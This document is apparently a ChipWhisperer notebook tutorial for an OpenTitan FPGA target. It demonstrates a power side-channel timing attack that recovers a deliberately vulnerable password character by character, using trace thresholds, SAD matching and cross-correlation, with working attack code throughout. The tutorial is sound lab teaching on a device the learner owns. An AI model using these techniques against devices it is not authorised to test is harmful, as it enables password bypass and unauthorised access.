# Timing Analysis with Power for Password Bypass

Supported setups:

SCOPES:

* OPENADC
* CWNANO

PLATFORMS:

* CWLITEARM
* CWLITEXMEGA
* CWNANO

This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. It will use a simple password check, and demonstrate how to perform a basic power analysis.

Note this is not a prerequisite to the tutorial on breaking AES. You can skip this tutorial if you wish to go ahead with the AES tutorial.

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'OpenTitan'
VERSION = 'HARDWARE'

# define the length of the password to guess
PW_LEN = 5

# Clock Frequency
FREQUENCY = 20e6 # system clock for OpenTitan 

In [ ]:
# import dependencies
import chipwhisperer as cw
from tqdm import tqdm, tnrange
import numpy as np
import time
import sys
import os

# Serial communication
import serial
encoding = 'utf-8'
# Plotting
import matplotlib.pyplot as plt

# Subprocess
import subprocess
from subprocess import Popen, PIPE, check_output

from pathlib import Path

# import color definition
from OpenTitan.Definitions.mColors import mColors

## Firmware

Like before, we'll need to setup our `PLATFORM`, then build the firmware:

In [ ]:
if PLATFORM == "OpenTitan":
    # define project directory
    HOME = str(Path.home())
    OPENTITAN_DIR = HOME + '/Work/backup_20MHz/opentitan' # '/opentitan/'
else:
    print("Please start the tutorial from beginning...\n")

Let us define some functions to build the project and to flash software to the target:

In [ ]:
def build_software():
    CMD = "ninja -C build-out sw/device/examples/basic_passwdcheck/basic_passwdcheck_export_fpga_artys7"
    try:
        p = subprocess.check_output(CMD, cwd=OPENTITAN_DIR, stderr=subprocess.STDOUT, shell=True, timeout=30)
        return 0
    except subprocess.TimeoutExpired as result:                                                                                                   
        print(mColors.CBLACK + """build process timed out. Retry it.""" + mColors.ENDC)
        return 1
    except subprocess.CalledProcessError as e:
        print(mColors.CBLACK + mColors.CORG + "command '{}' \nreturn with error (code {}):\n {}".format(e.cmd, e.returncode, e.output) + mColors.ENDC)
        if ("error") in str(e.output):
            print(mColors.CBLACK + mColors.CORG + "Please run 'meson -f' and check the build process" + mColors.ENDC)
        return 1

def flash_software():
    CMD = "build-bin/sw/host/spiflash/spiflash --input build-bin/sw/device/examples/basic_passwdcheck/basic_passwdcheck_fpga_artys7.bin"
    try:
        p = subprocess.check_output(CMD, cwd=OPENTITAN_DIR, stderr=subprocess.STDOUT, shell=True, timeout=30)
        return 0
    except subprocess.TimeoutExpired as result:                                                                                                   
        print(mColors.CBLACK + mColors.CORG + """flash process timed out. Retry it.""" + mColors.ENDC)
        return 1
    except subprocess.CalledProcessError as e:
        print(CSTYLE + CBLACK + "command '{}' \nreturn with error (code {}):\n {}".format(e.cmd, e.returncode, e.output) + mColors.ENDC)
        if ("Unable to open FTDI SPI interface.") in str(e.output):
            print(mColors.CBLACK + mColors.CORG + "Please try to replug the FTDI interface" + mColors.ENDC)
        return 1


In [ ]:
# run build_software once you want to change the password on target
err = build_software()
if err:
    print("Please check your ninja build process.")

## Setup

Setup is the same as usual, except this time we'll be capturing 2000 traces.

In [ ]:
# Connect to scope
%run "Setup_Scripts/Setup_OpenTitan.ipynb"
    
# Define outging Clock frequency for OpenTitan
scope.clock.clkgen_freq = FREQUENCY
print("CLKGEN target frequency = " + str(scope.clock.clkgen_freq/1e6) + " MHz")
print("")
time.sleep(0.01)
# Reset Target
reset_target(scope)

In [ ]:
# Connect to serial by detecting Arty S7 development board
reset_target(scope)
connectSerial(target, 230400)
time.sleep(0.01)

In [ ]:
# Flash SW
err = flash_software()
if err:
    print(mColors.CBLACK + mColors.CORG + "An error occured during flash process, verify bitstream is programmed and replug FTDI interface" + mColors.ENDC)

## Communicating With The Target

As was mentioned at the beginning of the tutorial, the firmware we loaded onto the target implements a basic password check. After getting a `'\n'` terminated password, the target checks it and enters an infinite loop, so before communicating with it, we'll need to reset it.

We'll be doing this a lot, so we'll define a function that resets the target (this function is also available by running "Setup_Scripts/Setup.ipynb" as we did above):

In [ ]:
def reset_target(scope):
    # Reset pin in OpenTitan layout has to be connected to pdic pin of ChipWhisperer 
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.1)
        scope.io.pdic = 'high_z' #XMEGA doesn't like pdic driven high
        time.sleep(0.1)
    # Reset pin in OpenTitan layout has to be connected to pdic pin of ChipWhisperer 
    if PLATFORM == "OpenTitan":
        scope.io.pdic = 'low'
        time.sleep(0.05)
        scope.io.pdic = 'high'
        time.sleep(0.05)
    else:  
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high'
        time.sleep(0.05)
        
    #Flush garbage too
    target.flush()

The target sends some text to us upon starting. After running the block below, you should see some text appear. 

In [ ]:
# Make sure outging Clock for OpenTitan is provided
scope.clock.clkgen_freq = FREQUENCY
print("CLKGEN target frequency = " + str(scope.clock.clkgen_freq/1e6) + " MHz\n")
print("")
time.sleep(0.05)


result = ""
ret = bytearray()
reset_target(scope)
target.flush()
time.sleep(0.05)
err = flash_software()
target.flush()
if err:
    print(mColors.CBLACK + mColors.CORG + "An error occured during flash process, verify bitstream is programmed and replug FTDI interface" + mColors.ENDC)
    
time.sleep(0.5) # wait for flash procedure
num_char = target.in_waiting()
while num_char > 0:
    ret += target.read()
    time.sleep(0.1)
    num_char = target.in_waiting()
    
if ret:
    try:
        result = str(ret, encoding, errors='ignore')
        result = result.split("flash!", 1)
        result = result[1]
        print(result)
    except:
        print("Try to excecute it again.")

Now we can send the target a password:

In [ ]:
time.sleep(0.5)
target.flush()
text = "h0px3\n"
time.sleep(0.1)
text_enc = text.encode()

target.write(text_enc)

And get the response. We sent it the right password (hopx3), so you should see "Access granted, Welcome!":

In [ ]:
time.sleep(1)
resp = bytearray()
resp += target.read()
response = str(resp, encoding, errors='ignore')

if response:
    print(mColors.CBLACK + mColors.CORG + response + mColors.ENDC)

**tip**

In real systems, you may often know one of the passwords, which is sufficient to investigate the password checking routines as we will do. You also normally have an ability to reset passwords to default. While the reset procedure would erase any data you care about, the attacker will be able to use this 'sacrificial' device to learn about possible vulnerabilities. So the assumption that we have access to the password is really just saying we have access to a password, and will use that knowledge to break the system in general.

## Recording Traces

Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll arm the scope just before we send our password attempt, then record the trace as we've done before.

In [ ]:
if PLATFORM == "CWNANO":
    scope.adc.samples = 800
elif PLATFORM == "OpenTitan":
    scope.adc.samples = 800
    scope.gain.db = 20         # default: 45

In [ ]:
# record traces

result = None
resp = bytearray()
target.flush()
reset_target(scope)
time.sleep(0.05)
err = flash_software()
if err:
    print(mColors.CBLACK + mColors.CORG + "An error occured during flash process, verify bitstream is programmed and replug FTDI interface" + mColors.ENDC)

time.sleep(0.5) # wait for flash procedure
num_char = target.in_waiting()
while num_char > 0:
    resp += target.read()
    time.sleep(0.1)
    num_char = target.in_waiting()
    
if resp:
    try:
        result = str(resp, encoding, errors='ignore')
        result = result.split("flash!", 1)
        result = result[1]
        print(result)
    except:
        print("Try to excecute it again.")


target.flush()
time.sleep(0.05)
scope.arm()
result = None
resp = bytearray()

text = "h0px3\n"
text_enc = text.encode()
target.write(text_enc)
ret = scope.capture()
if ret:
    print('Timeout happened during acquisition')

trace = scope.get_last_trace()

time.sleep(0.1)
reply = bytearray()
response = None
num_char = target.in_waiting()
while num_char > 0:
    reply += target.read()
    time.sleep(0.1)
    num_char = target.in_waiting()
    
if reply:
    response = str(reply, encoding, errors='ignore')
    print(mColors.CORG + response + mColors.ENDC)

Now that we have a trace, we'll plot it:

In [ ]:
%matplotlib notebook
%matplotlib inline
import matplotlib.pylab as plt
plt.rcParams['figure.dpi'] = 110

plt.grid()
plt.plot(trace, 'b')

Plot the trace again using Bokeh. It's useful for zooming in.

In [ ]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool

output_notebook()
p = figure()
x_range = range(0, len(trace))
p.line(x_range, trace)
show(p)

## Timing Analysis

Now that we can capture traces, we can begin planning our attack. First we'll make a function to guess a password and return a power trace, since we'll be repeating those steps a lot:

In [ ]:
def cap_pass_trace(pass_guess):
    resp = bytearray()
    reset_target(scope)
    time.sleep(0.01)
    flash_software()
    time.sleep(0.1) # wait for flashing/bootloader
    
    num_char = target.in_waiting()
    while num_char > 0:
        resp += target.read() # num_char, 10
        time.sleep(0.01)
        num_char = target.in_waiting()
        
    scope.arm()
    target.flush()
    time.sleep(0.01)
    target.write(pass_guess.encode())
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    time.sleep(0.25) # a simple wait to watch the LEDs
    return trace

Next, we'll try two different passwords and see if the power traces differ by length. One guess is incorrect and the other character should be the start of the correct password. When it differs in time, we can guess the full password. If not, we will try all characters unti it differs.
We'll then plot both traces on the same figure (with the first in red and the second in blue).

In [ ]:
# Compare timing of two traces
%matplotlib notebook
%matplotlib inline
import matplotlib.pylab as plt
import matplotlib.patches as patches
plt.rcParams['figure.dpi'] = 110

# record traces
scope.adc.samples = 800
scope.clock.adc_src = 'clkgen_x4'
scope.clock.reset_adc()

# Adjust the Gain in range [-6.5; 55] dB
db = 25.0
scope.gain.db = int(db)
db_str = str(round(scope.gain.db))
print("scope.gain.db = " + db_str)

text_correct = "h\n"    # character 'h' is in password
text_wrong = "\x00\n"   # \x00 null byte is not
print("Capturing trace 1 ...")
trace_correct = cap_pass_trace(text_correct)
time.sleep(0.1)
print("Capturing trace 2 ...")
trace_wrong   = cap_pass_trace(text_wrong)

# Basic sanity check
assert(len(trace_correct) == scope.adc.samples)
print("✔️ OK to continue!")

In [ ]:
import matplotlib.patches as patches
count = (get_ipython().execution_count)
figure = plt.figure(num=count, figsize=(5, 5), dpi=120)
#plt.rcParams['lines.linewidth'] = 1.0
ax = figure.add_subplot(111)

x_range = range(0, len(trace_correct))
plt.grid()
ax.plot(x_range, trace_wrong, 'orangered', label=text_wrong)
ax.plot(x_range, trace_correct, 'blue', label=text_correct)
plt.legend(loc="upper right")
rect = patches.Rectangle((50,0.08),450,-0.14,linewidth=1.2, edgecolor='k', fill=False, zorder=3)
ax.add_patch(rect)

dir_out = HOME + "/chipwhisperer/traces/" + str(int(scope.clock.clkgen_freq/1e6)) + "MHz/basicpwcheck/PiFilter-190uH-20uF-12R/"
if os.path.exists(dir_out):
    pass
else:
    try:
        os.mkdir(dir_out)
    except OSError as exc:
        if exc.errno != errno.EEXIST:
            raise
        pass


filename = dir_out + "compare_" + db_str + "dB_"
import os
i = 1
while os.path.exists('{}{:02d}.png'.format(filename, i)):
    i += 1

file = '{}{:02d}.png'.format(filename, i)
figure.savefig(file, bbox_inches='tight') # , dpi=1000)
print("Saved file to %s" % file)

You should see both traces start and end similarly, but differ elsewhere. If you look closely, you should see that the blue trace looks a lot like the red trace but shifted later in time. We'll use this timing difference to break various passwords!

Edit the above block to try different passwords and see how it changes for different lengths and number of correct characters. 

Go back to the original guesses (`"\x00\n"` and `"h\n"`) and find some distinct section that get shifted in time. Your target may differ, but in my case, there were some distinct section of about 0.3 at 310 in red and 350 in blue. The plot is interactive, so you can zoom in and move around using the buttons on the right side of the plot. Record their locations, value, and the difference in location (in my case, 0.3 at 312, and 0.31 at 356). 

Using distinct peaks may not always work. Instead of distinct peaks you can use where the two traces start to diverge. At the beginning the power traces are similar even though the number of characters correct is different. However, there is a point where they start to become significantly different. If you can find this spot you can use this spot to do the timing analysis instead. The difference in location should be the same as when using distinct peaks.

An even easier way to see this is to simply plot *every* possible first letter. If there is some sort of timing attack, we should see everything take one path, except for a single outlier. Let's try plotting a few traces this way and hope we get an interesting outlier.

In [ ]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook, reset_output
from bokeh.models import CrosshairTool, ColumnDataSource, LabelSet

reset_output() # stop opening a new tab
output_notebook()

p = figure(title="Compare passwords. Try to find a distinct section that differs in time.")

x_range = range(0, len(trace_correct))
p.line(x_range, trace_wrong, line_color='orangered', legend=text_wrong)
p.line(x_range, trace_correct, line_color='blue', legend=text_correct)
p.legend.label_text_font_size = '14pt'

p.rect([250], [0.125], [275], [0.55], fill_color=None, line_color='black', line_width=2)

show(p)

In [ ]:
# Help to find significant peaks that get shifted in time
from scipy.signal import find_peaks
import numpy as np

peaks, properties = find_peaks(-trace_wrong[0:600], prominence=0.19, width=0.1) # distance=50) # prominence=(None, 0.3))
x_range = range(0, 600)
p = figure(title="Find a distinct section that differs in time.")
p.line(x_range, trace_wrong, line_width=2, color='orangered', alpha=0.75)
p.circle(peaks, trace_wrong[peaks], size=5, color="black", alpha=0.9)
show(p)

print(','.join(map(str,peaks)))
# calculate the differences between the peaks
print((np.diff(peaks)))

## Attacking a Single Letter

Now that we've located a distinctive timing difference, we can start building our attack. We'll start with a single letter, since that will quickly give us some feedback on the attack.

The plan for the attack is simple: keep guessing letters until we no longer see the distinctive spike in the original location. To do this, we'll create a loop that:

* Figures out our next guess
* Does the capture and records the trace
* Checks if sample 229 is larger than -0.2 (replace with appropriate values)

To make things a little easier for later, we'll make a function that will return whether our spike is (guess incorrect) or isn't (guess correct) in the right location:

In [ ]:
def checkpass(trace, i):
    if PLATFORM == "CWNANO":
        #There's a bit of jitter
        return (trace[228 + 11*i] < 3 and trace[227 + 11*i] < 0.3)
    elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
        return trace[233 + 36*i] > -0.25
    elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        return trace[85 + 72 * i] > -0.2
    elif PLATFORM == "OpenTitan":
        return trace[342 + 44 * i] > 0.15

The below loop finds the first correct character, prints it, then ends. You should see "Success: h" after a while.

In [ ]:
guesslist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
with tqdm(total=len(guesslist), file=sys.stdout) as pbar:
    for c in guesslist:
        pbar.set_description('process ' + mColors.BOLD + c + mColors.ENDC, refresh=True)
        pbar.update(1)
        next_pass = password + c + "\n"
        trace = cap_pass_trace(next_pass)
        if checkpass(trace, 0):
            print("\n")
            print("character guessed: " + mColors.BOLD + c + mColors.ENDC)
            break

Note that you will likely need to change the values in `checkpass`, or simply define your own `checkpass()` function.

## Attacking the Full Password

Now that we can guess a single character, attacking the rest is easy; we just need to repeat the process in another loop, move the check point (this is the change is location you recorded earlier), and update our guess with the new correct letter.

After updating the below script and running it, you should see parts of the password printed out as each letter is found.

In [ ]:
%%time
guesslist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
for i in range(PW_LEN):
    with tqdm(total=len(guesslist), file=sys.stdout) as pbar:
        for c in guesslist:
            pbar.set_description('process ' + mColors.BOLD + c + mColors.ENDC, refresh=True)
            pbar.update(1)
            next_pass = password + c + "\n"
            trace = cap_pass_trace(next_pass)
            time.sleep(0.01)
            success_resp = "Access granted, Welcome!"
            resp = target.read()
            response = str(resp, 'utf-8', errors='ignore')
            if "granted" in response:
                print("\n")
                print(mColors.CORG + "Access granted: password = " + mColors.BOLD + next_pass + mColors.ENDC)
                break
            if checkpass(trace, i):
                password += c
                print("\n")
                print("character guessed now: " + mColors.BOLD + password + mColors.ENDC)
                break

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the `printf()`'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* If there were a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

## Attack via SAD Match

As you've seen, for simple timing attacks like this. However, looking at traces in this way has a number of disadvantages:

* If the offset between the correct and incorrect guesses changed, we would have to manually incorporate that into the attack
* If the offsets change (say changing the optimization level), we have to find the offsets between the traces again
* The attack is fairly finnicky and may require some trial and error 

Luckily, there's a few ways of finding time offsets between parts of traces that are more reliable and require much less manual work. For this section, we will be focusing on using a Sum of Absolute Difference (SAD) match, which is a method of measuring the difference between two signals to find if a target trace is or isn't shifted in time from a reference trace.

The SAD match itself is a simple calculation:

$$\sum_{j=0}^{J}|t_{ref,j}-t_{target,j}|$$

Where $t_{ref,j}$ is a single point of the reference trace, $t_{target,j}$ is a single point of the target trace, and $j$ is the point along the trace we're taking the difference at. This is performed along the length of the reference trace, $J$. Put simply, we're subtracting the two traces, taking the absolute value, then adding these absolute differences. If this value is low, the traces are very similar. If the value is high, they're very different. Our strategy will be as follows:

* Capture a reference trace and find a unique portion
* Guess another character and slide the reference along the trace, calculating the SAD at each offset until we find one below a certain threshold
* Repeat this until we find a character with a different offset than the reference - this is the correct character
* Repeat with the rest of the characters until we've broken the password

First, we'll need to make a function to calculate the offset based on a SAD match, which takes in the reference trace, the target trace, and a threshold to match at. Try to write this function yourself, but if you get stuck, `PA_SPA_1_answers.py` has a working version. For maximum compatability with the tutorial, make this function return `None` if it doesn't find a match.

In [ ]:
#def find_offset_SAD(ref, target_trace, threshold):
from OpenTitan.PA_SPA_1_answers import find_offset_SAD

Let's test our function on some simple lists:

In [ ]:
a = list(range(50))
b = [5, 6, 7]
offset = find_offset_SAD(b, a, 0.01)
assert offset == 5, "Incorrect offset from SAD function"

b = [8.5, 9, 10]
offset = find_offset_SAD(b, a, 1)
assert offset == 8, "Incorrect offset from SAD function with nonzero threshold"

### Choosing a Reference

Now that we have a working function to find an offset using a SAD match, let's capture a reference trace, as well as a trace with a correct guess:

In [ ]:
%matplotlib notebook
%matplotlib inline
import matplotlib.pyplot as plt
import matplotlib.patches as patches
plt.rcParams['figure.dpi'] = 130

# Adjustable Gain [-6.5; 55] dB
db = -10
scope.gain.db = int(abs(db))
db_str = str(round(scope.gain.db))
print("scope.gain.db = " + db_str)

###########################################
text_ref = "a\n" # "\x00\n"
ref_trace = cap_pass_trace(text_ref)
text_ref_cor = "h\n"
ref_correct = cap_pass_trace(text_ref_cor)
###########################################

# Create figure and axes
figure = plt.figure()
ax = figure.add_subplot(111)
plt.grid(zorder=1)
ax.plot(ref_trace, c='orangered', label=text_ref, zorder=2)
ax.plot(ref_correct, c='blue', label=text_ref_cor, zorder=2) # - 0.15

plt.legend(loc="upper right")
plt.xlabel('Samples')

rect = patches.Rectangle((100,0.4),300,-0.55,linewidth=1.25,edgecolor='k', fill=False, zorder=3)
ax.add_patch(rect) 

We've got two requirements for the reference: 

1. It should be fairly unique. For example, the section you select shouldn't match any later section in the same trace
2. It must be a portion that shifts in time. For example, the very beginning of the power trace probably doesn't shift in time here, but later sections definitely should.

For example, in the following trace, the black section doesn't shift in time, making it a poor choice. Meanwhile, the purple section does shift in time, but isn't unique: it's very likely that it will match with another part of the trace. The blue selection, however, is both unique and moves in time.
![](img/password_ref_selection.png)

Finally, selecting our reference:

In [ ]:
%matplotlib inline
import matplotlib.pyplot as plt
plt.rcParams['figure.dpi'] = 130

if PLATFORM == "CWNANO":
    #There's a bit of jitter
    ref = ref_trace[300:500]
elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
    ref = ref_trace[770:1000]
elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
    ref = ref_trace[110:265]
elif PLATFORM == "OpenTitan":
    ref = ref_trace[80:500]
    ref_cor = ref_correct[80:500]

if ref is not None: 
    fig = plt.figure()
    fig.suptitle('Reference of incorrect guess')
    plt.plot(ref, c='orangered', label=text_ref)
    plt.plot(ref_cor, c='blue', label=text_ref_cor)
    plt.legend(loc="upper left")
    plt.xlabel('Samples')
    plt.grid()

As a quick test, we should try the SAD match on another incorrect guess as well as the original reference trace: they should both have the same offset here. This also gives us a good opportunity to find a good threshold. If the threshold is too high, the trace will match early. If it's too low, it won't match at all:

In [ ]:
trace = cap_pass_trace("b\n")
offset1 = find_offset_SAD(ref, ref_trace, 6)
offset2 = find_offset_SAD(ref, trace, 6)

# if offset1 != offset 2, assert will complain
assert offset1 == offset2, "Mismatched offsets for incorrect guesses. Adjust threshold or choose a different reference"

Now let's see if we can guess a correct character using this technique. If the offset is higher than what we get from the reference trace, we know we've got a correct character:

In [ ]:
original_offset = find_offset_SAD(ref, ref_trace, 6)
print("original offset: ", original_offset)
guesslist = "abcdefghijklmnopqrstuvwxyz0123456789"

#Guess first character of password
with tqdm(total=len(guesslist), file=sys.stdout) as pbar:
    for c in guesslist:
        pbar.set_description('process ' + mColors.BOLD + c + mColors.ENDC)
        pbar.update(1)
        next_pass = c + "\n"
        trace = cap_pass_trace(next_pass)
        offset = find_offset_SAD(ref, trace, 6)
        if offset is None:
            print("Threshold likely too low")
            break
        elif offset == 0:
            print("Threshold likely too high")
            break
        if offset > offset1:
            print("\n")
            print("character guessed: " + mColors.BOLD + c + mColors.ENDC)
            break

Extending this to the rest of the password isn't too hard either. Simple iterate through all the characters. Again try writing this code yourself. One caveat here is that this technique will likely fail on the last password, since the part of the trace we're checking won't occur if we guess the password correctly. To work around this, we can simply check the response to see if we've got the whole password correct using `target.read()`. Again, if you're really stuck, a working guess function can be found in `PA_SPA_1_answers.py`

In [ ]:
from importlib import reload 
reload(OpenTitan.PA_SPA_1_answers)
#def guess_password_SAD_OpenTitan(cap_pass_trace, find_offset, ref, original_offset, threshold, target, PW_LEN):
from OpenTitan.PA_SPA_1_answers import guess_password_SAD_OpenTitan
original_offset = find_offset_SAD(ref, ref_trace, 8)
password = guess_password_SAD_OpenTitan(cap_pass_trace, find_offset_SAD, ref, original_offset, 8, target, PW_LEN)

With that, you should now have successfully broken the password again! Keep in mind that this is just one application of the SAD match: for example, it's quite useful for resynchronizing traces if random jitter is used as a countermeasure against side channel attacks, as is the case in tutorial `PA_CPA_3`. It is also available as a powerful trigger for the CW1200 Pro - in a typical target, we might not have access to a simple IO pin to trigger off of.

Keep in mind that this is just one of many possible ways to perform this attack - a similar one is performed in PA_Multi_1 using correlation instead of SAD. 

# Attack via cross-correlation

First we define a cross-correlation function that returns a value how much signal2 is shifted compared to signal1. Therefore, we use FFT function from scipy and numpy's argmax. 

In [ ]:
import numpy as np
from scipy.fft import fft, fftfreq, fftshift, ifft
from scipy import signal

def find_timeshift(signal1, signal2):
    sig1_f = fft(signal1)
    sig2_f = fft(signal2)
    sig1_fc = -sig1_f.conjugate()
    Z = ifft(sig1_fc*sig2_f)
    shift = np.argmax(np.abs(Z))
    return shift

## Attack the first character of the password

In [ ]:
# run this if you change the password
build_software() 

# record traces
scope.adc.samples = 800

trace_start = cap_pass_trace("\x00\n") # start from an incorrect guess, null-byte not in password
original_shift = find_timeshift(trace_start, trace_start)
shift = -1
guesslist = "abcdefghijklmnopqrstuvwxyz0123456789"
with tqdm(total=len(guesslist), file=sys.stdout, leave=True) as pbar:
    for c in guesslist:
        pbar.set_description('process ' + mColors.BOLD + c + mColors.ENDC + " | shift: " + str(shift), refresh=True)
        pbar.update(1)
        next_pass = c + "\n"
        trace = cap_pass_trace(next_pass)
        shift = find_timeshift(trace[50:600], trace_start[50:600])
        if shift is not None:
            if shift > (original_shift):
                print("\n")
                print("character guessed: " + mColors.BOLD + c + mColors.ENDC)
                break

## Attack the entire password

In [ ]:
%%time
from timeit import default_timer as timer

# run this if the the password on target changed
build_software() 

trace_start = cap_pass_trace("\x00\n") # start from an incorrect guess, null-byte not in password
def guess_password_CORR_OpenTitan():
    original_shift = find_timeshift(trace_start, trace_start)
    shift = original_shift
    guesslist = "abcdefghijklmnopqrstuvwxyz0123456789"
    password = ""
    for i in range(PW_LEN):
        with tqdm(total=len(guesslist), file=sys.stdout, leave=False) as pbar:
            for c in guesslist:
                pbar.set_description('process ' + mColors.BOLD + c + mColors.ENDC + " | shift: " + str(shift), refresh=True)
                pbar.update(1)
                next_pass = password + c + "\n"
                trace = cap_pass_trace(next_pass)
                time.sleep(0.01)
                success_resp = "Access granted, Welcome!"
                resp = target.read()
                response = str(resp, 'utf-8', errors='ignore')
                if "granted" in response:
                    print("\n")
                    print(mColors.CORG + "Access granted: password = " + mColors.BOLD + next_pass + mColors.ENDC)
                    return next_pass
                shift = find_timeshift(trace_start[100:600], trace[100:600])
                if shift is not None:
                    if shift > original_shift:
                        password += c
                        print("\n")
                        print("Success, password now: " + mColors.BOLD + password + mColors.ENDC)
                        original_shift = shift
                        break
    return password
                    
password = guess_password_CORR_OpenTitan().strip('\n')

## Conclusion

This tutorial has demonstrated the use of the simple power side-channel analysis for performing timing attacks. Three techniques were used to break a password with a timing vulnerability.

In [ ]:
scope.dis()
target.dis()

## Tests

In [ ]:
assert (password == "h0px3"), "Failed to break password, got {}.".format(password)